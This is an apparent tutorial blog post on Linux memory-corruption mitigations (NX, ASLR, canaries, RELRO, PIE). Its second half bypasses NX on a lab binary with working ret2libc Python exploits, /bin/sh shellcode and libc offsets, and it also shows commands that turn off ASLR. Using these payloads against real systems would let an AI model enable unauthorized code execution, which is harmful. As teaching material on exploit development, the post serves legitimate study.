2. Linux Exploit Countermeasures and Bypasses (2)
- published
- reading time
- 15 minutes
To make exploitation more challenging, several mitigations have been developed and widely implemented. Let’s dive into some of the most popular ones and understand how they work:
1. DEP/NX (Data Execution Prevention / No eXecute):
Data Execution Prevention (DEP), also called No eXecute (NX), is a security feature that prevents code from running in non-executable memory regions like the stack or heap, blocking buffer overflow attacks that inject shellcode into these areas. The No-Execute (NX) bit, also known as Execute Disable (XD) in Intel terminology, is a hardware mechanism marking memory regions as non-executable, so code stored there cannot run. The NX bit was first introduced by AMD and later adopted by Intel as XD. It became widely implemented in operating systems starting with Windows XP SP2 and various Linux distributions. Most modern processors support this feature, allowing operating systems to enforce memory protections effectively.
How it Works: DEP/NX marks memory pages as either writable or executable, but never both. This means that even if an attacker injects malicious code into a writable region, it can’t be executed.
Example: Trying to execute shellcode from the stack with NX enabled will cause the program to crash, preventing exploitation.
2. ASLR (Address Space Layout Randomization):
Address Space Layout Randomization (ASLR) introduces randomness by shuffling the memory addresses of important regions, such as the stack, heap, and libraries, each time the program runs. This unpredictability makes it far harder for attackers to predict where their payload or code will end up.
How it Works: ASLR assigns a different memory address to regions of a process each time it’s loaded. This means an attacker can’t rely on specific memory addresses staying the same across runs.
Example: If an attacker tries to jump to a specific libc function by guessing its address, ASLR will frustrate these efforts by randomizing the location on each execution.
ASLR Configuration in Linux:
You can check and configure ASLR settings in Linux by interacting with the /proc/sys/kernel/randomize_va_space
file. This file controls the level of randomization applied:
0
: No randomization (static memory layout).1
: Conservative randomization (randomizes shared libraries, stack, heap, and mmap).2
: Full randomization (includes brk() management).
To enable full randomization, use:
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
The following C program demonstrates ASLR’s effect by displaying addresses for a function, a local variable, and a dynamically allocated heap variable each time the program runs.
// gcc -m32 aslr.c -o aslr
// gcc -m32 aslr.c -o aslr
#include <stdio.h>
#include <stdlib.h>
void print_addresses();
int main() {
int *heap_variable = (int *)malloc(sizeof(int)); // Allocate memory on the heap
print_addresses(); // Print function and variable addresses
printf("Address of heap variable: %p\n", (void *)heap_variable); // Print heap address
free(heap_variable); // Free memory
return 0;
}
void print_addresses() {
int local_variable;
printf("Address of main: %p\n", (void *)main);
printf("Address of local variable: %p\n", (void *)&local_variable);
}
Run the program multiple times with ASLR enabled (set to 2
):
$ ./aslr
Address of main: 0x566451ad
Address of local variable: 0xffd29fac
Address of heap variable: 0x581761a0
$ ./aslr
Address of main: 0x566221ad
Address of local variable: 0xffbcf99c
Address of heap variable: 0x5701b1a0
$ ./aslr
Address of main: 0x566441ad
Address of local variable: 0xffb70fbc
Address of heap variable: 0x570f91a0
Notice how the addresses vary each time, making memory layout unpredictable.
Disabling ASLR:
By setting /proc/sys/kernel/randomize_va_space
to 0
, ASLR is disabled, and addresses remain static across runs:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ ./aslr
Address of main: 0x565561ad
Address of local variable: 0xffffd64c
Address of heap variable: 0x5655a1a0
$ ./aslr
Address of main: 0x565561ad
Address of local variable: 0xffffd64c
Address of heap variable: 0x5655a1a0
$ ./aslr
Address of main: 0x565561ad
Address of local variable: 0xffffd64c
Address of heap variable: 0x5655a1a0
With ASLR disabled, addresses stay constant on each run, removing the randomization layer, making it easier for attackers to predict addresses and exploit memory vulnerabilities.
It’s important to note that even with ASLR enabled, the offset for functions and gadgets within libc remains the same. This means that once we know the libc base address, we can determine the address of any libc function or gadget at runtime simply by adding the known offset to the base.
3. Stack Canaries
Stack canaries, also known as security cookies, are a protective mechanism used to defend against buffer overflow attacks. Stack canaries act as a safeguard against buffer overflow attacks by introducing a random value, referred to as a “canary,” onto the stack near the return address. This canary serves as a sentinel that monitors any unauthorized modifications to the stack area.
How it Works: During a function call, a random canary value is inserted between the buffer and the return address on the stack. Before returning from a function, the program checks the integrity of this canary value. If it finds that the canary has been altered, it suggests a potential buffer overflow attack, prompting the program to take defensive actions such as terminating execution or invoking additional security measures.
Types of Stack Canaries:
-
Terminator Canaries These contain common string terminators like
\x00
,\r
,\n
, and\xFF
. They help prevent attacks involving string operations by stopping prematurely due to these terminators. -
Random Canaries Generated randomly at runtime, typically drawn from /dev/urandom if available. This randomness makes it challenging for attackers to predict or manipulate the canary value.
-
Random XOR Canaries Combine random numbers with control data (like the frame pointer and return address) using XOR operations. This ensures even slight modifications to the canary will result in incorrect values, triggering immediate termination.
4. RELRO (Relocation Read-Only):
Relocation Read-Only (RELRO) is a security feature implemented in the GNU Linker to enhance the security of ELF (Executable and Linkable Format) binaries by protecting certain sections from being overwritten. This feature is particularly focused on safeguarding the Global Offset Table (GOT), which is crucial for dynamic linking and can be exploited in various attacks. RELRO stands for Relocation Read-Only. It primarily aims to prevent attackers from modifying the GOT, which holds addresses for dynamically linked functions. By making these sections read-only after relocation, RELRO mitigates risks associated with binary exploitation techniques, such as GOT overwrite attacks.
Types of RELRO There are two modes of RELRO:
- Partial RELRO:
- This mode marks the non-Procedure Linkage Table (non-PLT) part of the GOT as read-only after relocation.
- The PLT remains writable, meaning that while it provides some protection, it does not fully safeguard against all types of attacks.
- Partial RELRO is often the default setting in many GCC-compiled binaries.
- Full RELRO:
- In this mode, both the GOT and PLT are made read-only after relocation.
- This provides a higher level of security by preventing any modifications to these sections during runtime.
- Full RELRO can increase startup time since all dynamic symbols must be resolved before execution begins.
Implementation of RELRO:
$ # For Partial RELRO:
$ gcc -o file file.c -Wl,-z,relro
$ # For Full RELRO:
$ gcc -o file file.c -Wl,-z,relro,-z,now
Full RELRO provides stronger protection against GOT overwrite attacks compared to Partial RELRO. However, it can lead to longer startup times since all symbols must be resolved before execution.
We’ll dive deeper into this concept when we explore bypass techniques.
5. PIE (Position Independent Executables)
Position Independent Executables (PIE) randomize the location of the executable itself, adding another layer of unpredictability to binary loading. Unlike ASLR, which affects shared libraries, PIE applies to the binary’s main code, making it more challenging to predict code locations for return-oriented programming (ROP) attacks.
How it Works: PIE enables the entire binary to be relocated to different memory addresses each time it runs. This feature requires the binary to be compiled in a way that allows it to operate independently of a fixed memory location.
Example: If an attacker tries to jump to a specific function within the executable, PIE will have randomized its position, forcing them to dynamically resolve the new address.
To check which mitigations are enabled on a binary
, you can use checksec from the pwntools
suite:
$ pwn checksec exp2_nx
[*] '/home/kali/Desktop/Blogs/Materials/x86_exp_dev/02/exp2_nx'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Stripped: No
From the output, we can observe:
- NX: The stack is non-executable (NX enabled), blocking code execution in writable areas.
- RELRO: Partial RELRO is enabled, providing limited protection for GOT entries.
- Stack Canary: Not found, so the binary lacks buffer overflow protection for stack frames.
- PIE: Position Independent Executable is disabled, meaning the executable loads at a fixed address.
1. Bypassing DEP/NX (Data Execution Prevention / No eXecute):
Now, let’s work on bypassing NX! We’ll attempt to execute the same shellcode from our jmp eax
example.
📝 Note: Make sure ASLR is disabled before proceeding.
Compile the Binary with NX Enabled
$ gcc -m32 exp1.c -fno-stack-protector -no-pie -o exp2_nx
For this test, I’ve renamed exp1.py
to exp2.py
and updated it to point to our jmp eax gadget.
#!/usr/bin/python2
# exp2.py
import struct
offset = 62
libc_base = 0xf7d5f000
jmp_eax = 0x00024fe3
payload = "\x90"*10 # 10 NOPS
payload += "\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" # /bin/sh shellcode
payload += "A"*(offset-len(payload)) # padding
#payload += "BBBB" # EIP
payload += struct.pack("<I",libc_base+jmp_eax) # EIP
print(payload)
Now, let’s try to execute the exploit with NX enabled on exp2_nx
:
$ ./exp2_nx $(./exp2.py)
Segmentation fault (core dumped)
Let’s examine the core dump to see what happened:
$ gdb -core core
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0xffffd5ce in ?? ()
──────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────
EAX 0xffffd5ce ◂— 0x90909090
EBX 0x41414141 ('AAAA')
ECX 0xffffd910 ◂— 0xf7d83f
EDX 0xffffd60d ◂— 0xf7d83f
EDI 0xf7ffcb60 ◂— 0
ESI 0xffffd700 —▸ 0xffffd914 ◂— 'SHELL=/usr/bin/bash'
EBP 0x41414141 ('AAAA')
ESP 0xffffd610 —▸ 0xffffd800 ◂— 6
EIP 0xffffd5ce ◂— 0x90909090
────────────────────────────[ DISASM / i386 / set emulate on ]────────────────────────────
► 0xffffd5ce nop
0xffffd5cf nop
0xffffd5d0 nop
0xffffd5d1 nop
...
🔍 Here, we can see that we successfully landed on the NOP sled, but because the shellcode is in a non-executable memory region (due to NX), it cannot be executed. 😞
This example demonstrates the effectiveness of NX by preventing code execution in non-executable memory regions. 🛡️
So, how can we bypass NX? 🤔 While we can’t execute injected shellcode directly due to the non-executable stack, we can still execute existing code within the binary or libraries. This approach is called Return-Oriented Programming (ROP).
With ROP, we construct a payload that leverages small “gadgets”—existing sequences of instructions ending in a ret—to piece together our own custom execution flow. Essentially, instead of injecting new code, we’re “reusing” code that’s already in memory to achieve our exploit goals.
In this example, let’s use a technique called Return-to-libc (ret2libc) to bypass NX.
Ret2libc is a simpler and more specific form of ROP where the attacker uses the existing functions in the C standard library (like system(), exit(), etc.) to perform actions, particularly when trying to execute a shell. When the stack is non-executable, shellcode injection won’t work. But instead of injecting our own code, we can reuse code that’s already loaded in memory—in this case, from the C library (libc), which includes functions like system()
and string pointers like /bin/sh
.
Here’s how ret2libc works:
- Find libc functions: We locate the
system()
function and a pointer to/bin/sh
within libc. By callingsystem("/bin/sh")
, we can spawn a shell. - Modify the payload: Instead of shellcode, our payload will set up the stack to call
system("/bin/sh")
, effectively giving us shell access by reusing safe code already loaded.
Let’s implement this with our example exploit!
Find system()
offset within libc
:
$ nm -D /usr/lib32/libc.so.6 | grep -i system
000524c0 T __libc_system@@GLIBC_PRIVATE
00171b20 T svcerr_systemerr@GLIBC_2.0
000524c0 W system@@GLIBC_2.0
For more info on nm
refer my blog.
The offset for the system
function in libc is 0x524c0
. We can verify this using GDB with the pwndbg extension.
$ gdb ./exp2_nx
pwndbg> b main
Breakpoint 1 at 0x804919f
pwndbg> run
pwndbg> xinfo system
Extended information for virtual address 0xf7db14c0:
Containing mapping:
0xf7d82000 0xf7f0e000 r-xp 18c000 23000 /usr/lib32/libc.so.6
Offset information:
Mapped Area 0xf7db14c0 = 0xf7d82000 + 0x2f4c0
File (Base) 0xf7db14c0 = 0xf7d5f000 + 0x524c0
File (Segment) 0xf7db14c0 = 0xf7d82000 + 0x2f4c0
File (Disk) 0xf7db14c0 = /usr/lib32/libc.so.6 + 0x524c0
Containing ELF sections:
.text 0xf7db14c0 = 0xf7d821c0 + 0x2f300
xinfo
command will provide extended information about the system function, showing details about its memory mapping.
From this output, we can see that the libc base address is 0xf7d5f000 and the offset for system is confirmed as 0x524c0. This information is crucial for constructing our exploit.
Now, next step is finding the offset of string "/bin/sh"
.
We can use strings
utility for it:
$ strings -a -t x /usr/lib32/libc.so.6 | grep "/bin/sh"
1c9e3c /bin/sh
So the offset for string “/bin/sh” in libc is 0x1c9e3c.
We can also use GDB (pwndbg) for it:
pwndbg> search "/bin/sh"
Searching for byte: b'/bin/sh'
libc.so.6 0xf7f28e3c '/bin/sh'
So the offset will be 0xf7f28e3c-0xf7d5f000
=0x1c9e3c
To understand how function calls are made in x86 architecture and how to exploit them using the return-to-libc (ret2libc) technique, we need to break down a few concepts, particularly the call instruction and the function’s stack frame.
Function Call Mechanism
-
Call Instruction: When a function is called using the call instruction, the CPU performs the following steps:
- Pushes the return address (the address of the instruction following the call) onto the stack.
- Transfers control to the function by jumping to its address.
-
Transfers Control: The CPU jumps to the function’s address, effectively transferring control to that function.
-
Handles Function Arguments:
- Arguments passed to the function are typically placed on the stack or in specific registers (depending on the calling convention).
- For example, in the
cdecl
calling convention, arguments are pushed onto the stack inright-to-left
order before thecall
instruction is executed.
For example:
call my_function
If my_function
is located at address 0x08048400
, the CPU will push the return address (say, 0x0804840A
) onto the stack and jump to 0x08048400
.
Argument Handling
For instance, if my_function
expects two integer arguments, you might see something like this:
push 2 ; Push the second argument onto the stack
push 1 ; Push the first argument onto the stack
call my_function
Practical Example: C Program 🖥️ I’ve used the following C program to explain it more practically:
#include <stdio.h>
void two_str(char *s1, char *s2) {
printf("%s\n",s1);
printf("%s\n",s2);
}
int main() {
char *str1="hello";
char *str2="world";
two_str(str1,str2);
}
To see how function calls work, disassemble main
:
pwndbg> disass main
Dump of assembler code for function main:
0x0804919a <+0>: lea ecx,[esp+0x4]
0x0804919e <+4>: and esp,0xfffffff0
0x080491a1 <+7>: push DWORD PTR [ecx-0x4]
0x080491a4 <+10>: push ebp
0x080491a5 <+11>: mov ebp,esp
0x080491a7 <+13>: push ecx
0x080491a8 <+14>: sub esp,0x14
0x080491ab <+17>: call 0x80491e5 <__x86.get_pc_thunk.ax>
0x080491b0 <+22>: add eax,0x2e44
0x080491b5 <+27>: lea edx,[eax-0x1fec]
0x080491bb <+33>: mov DWORD PTR [ebp-0xc],edx
0x080491be <+36>: lea eax,[eax-0x1fe6]
0x080491c4 <+42>: mov DWORD PTR [ebp-0x10],eax
0x080491c7 <+45>: sub esp,0x8
0x080491ca <+48>: push DWORD PTR [ebp-0x10]
0x080491cd <+51>: push DWORD PTR [ebp-0xc]
0x080491d0 <+54>: call 0x8049166 <two_str>
0x080491d5 <+59>: add esp,0x10
0x080491d8 <+62>: mov eax,0x0
0x080491dd <+67>: mov ecx,DWORD PTR [ebp-0x4]
0x080491e0 <+70>: leave
0x080491e1 <+71>: lea esp,[ecx-0x4]
0x080491e4 <+74>: ret
At instructions +48
and +51
, you can see that pointers to the strings are pushed onto the stack.
Let’s set a breakpoint at 0x080491d0
(i.e., *main + 54
) and run the program:
pwndbg> b *0x080491d0
Breakpoint 1 at 0x80491d0
pwndbg> run
Now, let’s examine the stack right before we call two_str:
pwndbg> x/2wx $sp
0xffffd5d0: 0x0804a008 0x0804a00e
pwndbg> x/s 0x0804a008
0x804a008: "hello"
pwndbg> x/s 0x0804a00e
0x804a00e: "world"
pwndbg> stack 2
00:0000│ esp 0xffffd5d0 —▸ 0x804a008 ◂— 'hello'
01:0004│-024 0xffffd5d4 —▸ 0x804a00e ◂— 'world'
You can see that the pointer to the string world
is pushed before the pointer to the string hello
.
Now, let’s continue to the function call:
pwndbg> b *0x8049166
Breakpoint 2 at 0x8049166
pwndbg> c
When we print the stack now, we see that the top of the stack points to the return address 0x080491d5
(i.e., *main+59
):
pwndbg> stack 3
00:0000│ esp 0xffffd5cc —▸ 0x80491d5 (main+59) ◂— add esp, 0x10
01:0004│-028 0xffffd5d0 —▸ 0x804a008 ◂— 'hello'
02:0008│-024 0xffffd5d4 —▸ 0x804a00e ◂— 'world'
pwndbg> x/3wx $esp
0xffffd5cc: 0x080491d5 0x0804a008 0x0804a00e
I hope now you understood what happens when we call a function with arguments.
Now, following picture will clear your understanding on ret2libc
#!/usr/bin/python2
# exp3.py
import struct
offset = 62
libc_base = 0xf7d5f000
system = libc_base + 0x524c0
bin_sh = libc_base + 0x1c9e3c
payload = "A"*offset
payload += struct.pack("<I",system) # EIP -> system
payload += struct.pack("<I",0xdeadbeef) # return address
payload += struct.pack("<I",bin_sh) # arg -> /bin/sh
print(payload)
For easy understanding I’ve used 0xdeadbeef
as return address where we should land after executing system("/binsh")
.
./exp2_nx $(./exp3.py)
$ pwd
/home/kali/Desktop/Blogs/Materials/x86_exp_dev/02
As you can see we got shell :)
But let’s exit from the shell see what happens.
./exp2_nx $(./exp3.py)
$ pwd
/home/kali/Desktop/Blogs/Materials/x86_exp_dev/02
$ exit
Segmentation fault (core dumped)
As you can see we got segfault. Let’s examine the core dump.
$ gdb -core core
...
──────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────
EAX 0
EBX 0x41414141 ('AAAA')
ECX 0xffffd2d4 ◂— 0
EDX 0
EDI 0xf7ffcb60 ◂— 0
ESI 0xffffd6c0 —▸ 0xffffd8de ◂— 'SHELL=/usr/bin/bash'
EBP 0x41414141 ('AAAA')
ESP 0xffffd5d4 —▸ 0xf7f28e3c ◂— '/bin/sh'
EIP 0xdeadbeef
────────────────────────────[ DISASM / i386 / set emulate on ]────────────────────────────
Invalid address 0xdeadbeef
...
As you can see we landed on invalid address.
For landing on safe address we will use exit()
function.
$ nm -D /usr/lib32/libc.so.6 | grep exit
...
0003eac0 T exit@@GLIBC_2.0
We can verify this:
pwndbg> xinfo exit
Extended information for virtual address 0xf7d9dac0:
Containing mapping:
0xf7d82000 0xf7f0e000 r-xp 18c000 23000 /usr/lib32/libc.so.6
Offset information:
Mapped Area 0xf7d9dac0 = 0xf7d82000 + 0x1bac0
File (Base) 0xf7d9dac0 = 0xf7d5f000 + 0x3eac0
File (Segment) 0xf7d9dac0 = 0xf7d82000 + 0x1bac0
File (Disk) 0xf7d9dac0 = /usr/lib32/libc.so.6 + 0x3eac0
Containing ELF sections:
.text 0xf7d9dac0 = 0xf7d821c0 + 0x1b900
Here’s our exploit to perform ret2libc:
#!/usr/bin/python2
# exp3.py
import struct
offset = 62
libc_base = 0xf7d5f000
system = libc_base + 0x524c0
bin_sh = libc_base + 0x1c9e3c
exit_func = libc_base + 0x3eac0
payload = "A"*offset
payload += struct.pack("<I",system) # EIP -> system
# payload += struct.pack("<I",0xdeadbeef) # return address
payload += struct.pack("<I",exit_func) # return address
payload += struct.pack("<I",bin_sh) # arg -> /bin/sh
print(payload)
By replacing 0xdeadbeef
with a valid exit
function address, we ensure the process exits gracefully instead of crashing.😊
./exp2_nx $(./exp3.py)
$ pwd
/home/kali/Desktop/Blogs/Materials/x86_exp_dev/02
$ exit
echo $?
0
In Linux, the command echo $?
is used to print the exit status of the last executed command.
Extra Info:
What if we want the exit status to be 255?
To set the exit status to 255, which in hexadecimal is represented as 0xFF, we can add 0xff as an argument to exit()
right after the pointer to the string "/bin/sh"
.
#!/usr/bin/python2
# exp3.py
import struct
offset = 62
libc_base = 0xf7d5f000
system = libc_base + 0x524c0
bin_sh = libc_base + 0x1c9e3c
exit_func = libc_base + 0x3eac0
payload = "A"*offset
payload += struct.pack("<I",system) # EIP -> system
# payload += struct.pack("<I",0xdeadbeef) # return address
payload += struct.pack("<I",exit_func) # return address
payload += struct.pack("<I",bin_sh) # arg -> /bin/sh
payload += struct.pack("<I",0xff) # exit status
print(payload)
./exp2_nx $(./exp3.py)
bash: warning: command substitution: ignored null byte in input
$ pwd
/home/kali/Desktop/Blogs/Materials/x86_exp_dev/02
$ exit
echo $?
255
This way, we can control the exit status directly through our payload.